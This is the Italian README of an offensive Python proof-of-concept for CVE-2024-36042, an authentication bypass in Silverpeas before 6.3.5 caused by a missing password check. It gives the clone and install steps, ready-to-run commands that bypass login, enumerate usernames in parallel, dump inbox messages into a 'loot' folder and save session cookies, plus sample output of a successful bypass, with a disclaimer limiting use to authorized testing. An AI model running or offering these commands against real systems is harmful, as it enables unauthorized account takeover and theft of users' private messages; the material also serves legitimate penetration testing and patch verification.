
PoC in Python per il bypass dell'autenticazione CVE-2024-36042 in Silverpeas < 6.3.5. Include rilevamento della versione, enumerazione multi-thread degli utenti, estrazione dei messaggi e report strutturati per test di sicurezza autorizzati.
Un proof-of-concept Python3 pulito e di livello professionale per CVE-2024-36042 — un bypass dell'autenticazione in Silverpeas < 6.3.5 causato dalla mancata validazione della password in
AuthenticationServlet.
Silverpeas AuthenticationServlet accetta una richiesta di login anche quando il parametro Password è omesso dal corpo POST, concedendo l'accesso a una sessione autenticata per qualsiasi nome utente noto. Questo strumento dimostra la vulnerabilità in modo responsabile attraverso un framework di exploit modulare e multithread con ricognizione avanzata, estrazione di dati e generazione di report professionali.
Versioni vulnerabili: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
Lo strumento supporta quattro modalità di output principali per i messaggi scaricati tramite --message-output:
console (predefinita): stampa i messaggi puliti direttamente nel terminale con evidenziazione delle parole chiave.markdown: genera un report {username}_messages.md per account nella directory di output.files: crea una cartella per account e salva ogni messaggio come file individuale (es. message_0006.md) con ID riempiti con zeri per un ordinamento pulito del filesystem.both: combina le modalità console e markdown.outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (optional: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Base URL of Silverpeas (required)
-u, --user Single username to target
--userlist File with one username per line
--dump-messages Scrape and display inbox messages
--max-id Max message ID to check (default: 50)
--threads Concurrent workers (default: 5)
--proxy HTTP proxy URL
--message-output Output mode: {console, markdown, files, both}
--output-format File format: {md, txt}
--json Export full JSON report
--csv Export CSV of scraped messages
--outdir Output directory for exports
--no-color Disable ANSI color output (useful for logs)
--save-raw-html Save original HTML responses for debugging
--check-version Fingerprint version only
--no-exploit Skip exploitation (pair with --check-version)
--quiet, -q Minimal output
--no-banner Suppress banner
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.
[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account │ Status │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCESS │ 6 │
│ admin │ FAILED │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON report -> ./report_20260516_013210.json
Questo repository fa parte del mio portfolio di sicurezza offensiva. Dimostra:
Questo strumento è fornito esclusivamente per test di sicurezza autorizzati, ricerca e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre un permesso esplicito prima di testare qualsiasi infrastruttura che non possiedi.
MIT
| Funzionalità | Descrizione |
|---|
| Rilevamento versione | Identifica la versione di Silverpeas e lo stato di vulnerabilità prima dell'exploit. |
| Multithread | Enumerazione utenti concorrente tramite ThreadPoolExecutor con output thread-safe. |
| Scoperta avanzata | Scoperta degli endpoint multilingue (inglese/francese) con probing multi-ID. |
| Estrazione dati | Dump dei messaggi ad alta fedeltà con deduplicazione e filtraggio del boilerplate. |
| Output flessibile | Supporto per console, report Markdown ed esportazione di singoli file (.md o .txt). |
| Proxy e debug | Instradamento tramite Burp/ZAP (--proxy) e salvataggio dell'HTML grezzo per il debug del parser. |
| UX pulita | Tabelle riepilogative ASCII, evidenziazione delle parole chiave e controllo opzionale dei colori ANSI. |